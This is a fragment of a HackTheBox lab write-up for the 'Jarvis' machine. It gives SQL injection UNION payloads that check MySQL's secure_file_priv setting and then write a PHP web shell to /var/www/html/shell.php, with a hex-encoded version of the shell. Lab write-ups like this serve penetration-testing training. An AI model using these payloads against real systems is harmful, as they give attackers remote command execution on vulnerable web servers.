zhsh9/HackTheBox-Writeup/source/linux/Jarvis.md

 - **manual get shell**
   - `-1 UNION SELECT 1, @@version, user(), system_user(), (SELECT GROUP_CONCAT(concat_ws(':', variable_name, variable_value) SEPARATOR '; ') FROM information_schema.global_variables WHERE variable_name LIKE '%secure%'), 6, 7`
+    - When the value of `secure_file_priv` is not set, it means there are no restrictions on the import or export operations for `mysqld`.
   - `-1 UNION SELECT 1,2,3,4,5,6,'<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'`
     - `<?php system($_GET["cmd"]); ?>` can be hex format
     - `0x3c3f7068702073797374656d28245f4745545b22636d64225d293b203f3e`